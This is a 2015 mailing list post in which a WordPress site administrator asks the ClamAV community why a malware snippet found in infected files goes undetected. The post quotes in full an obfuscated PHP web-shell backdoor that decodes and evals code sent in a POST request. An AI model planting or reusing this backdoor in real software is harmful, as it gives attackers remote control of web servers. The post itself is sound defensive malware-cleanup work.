[clamav-users] basic malware missed???

Steve Holdoway steve at greengecko.co.nz
Tue Mar 24 17:40:52 EDT 2015


Hi folks,

I'm in the process of cleaning up an infected wordpress website and am
finding a number of files that contain 

<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>

Inserted at the top of the file.

Surely this is something pretty simple to catch? 

I'/m scanning the docroot nightly, and freshclam is up to date... output
from just run freshclam:

# freshclam
ClamAV update process started at Wed Mar 25 08:38:55 2015
main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60,
builder: neo)
Downloading daily-20233.cdiff [100%]
Downloading daily-20234.cdiff [100%]
daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder:
jesler)
bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63,
builder: dgoddard)
Database updated (3781751 signatures) from db.au.clamav.net (IP:
117.104.160.194)

I'm finding them by searching for the string "PCT4BA6ODSE"

Shouldn't this be in there already? If there is a process to add this
can someone please point me to the docs?

Thanks,



Steve


-- 
Steve Holdoway BSc(Hons) MIITP
http://www.greengecko.co.nz
Linkedin: http://www.linkedin.com/in/steveholdoway
Skype: sholdowa




More information about the clamav-users mailing list